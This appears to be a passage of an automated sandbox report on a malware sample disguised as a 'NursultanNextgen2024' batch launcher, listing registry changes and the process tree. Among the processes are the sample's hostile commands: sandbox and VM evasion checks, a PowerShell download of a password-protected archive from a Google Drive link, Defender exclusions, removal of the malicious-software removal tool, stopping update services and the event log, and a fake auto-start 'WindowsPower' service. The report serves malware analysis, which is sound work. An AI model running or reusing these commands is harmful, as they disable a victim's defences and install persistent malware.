| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "835524279" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31114606" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5D3F90F1-3161-11EF-B03F-4A72145DDB9E} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31114606" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c517910592b48541be24303fa89e939b0000000002000000000010660000000100002000000079079d25de7655f64981d258529f7902f4e1cd60a1ab2a0dc0ecc0e3fbf88d44000000000e80000000020000200000000ff880dee692cd78f097bce5b483c1d32b31a32b421f03805d227f57db23584b200000007450e57fde4a12cec8a59d1ace09bc201bb7f157a075be945e93896be07753f340000000c097fd5b8a5be3af348984fb8efbbb6fac540df69d53052fb1a443de22f1b6a6d81e6c366cd7ae2213093a8289bb09e8a110d93550298f4e9b1ec9c55f9d58ca | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d074e2316ec5da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133636215826211716" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\04de7b3f382c41f8bfa36ea205f3ae807457ff7f
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\TestEdit.xhtml
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1388 CREDAT:82945 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffc8269758,0x7fffc8269768,0x7fffc8269778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1792 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2956 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4452 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4616 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4656 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4764 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5068 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5068 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3700 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3012 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3120 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat" "
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5348 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey ASSOC=ENDLOCAL
C:\Windows\system32\timeout.exe
timeout /T 10 /NOBREAK
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WindowsPower"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WindowsPower" binpath= "C:\ProgramData\windows\powershell.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WindowsPower"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\windows\powershell.exe
C:\ProgramData\windows\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
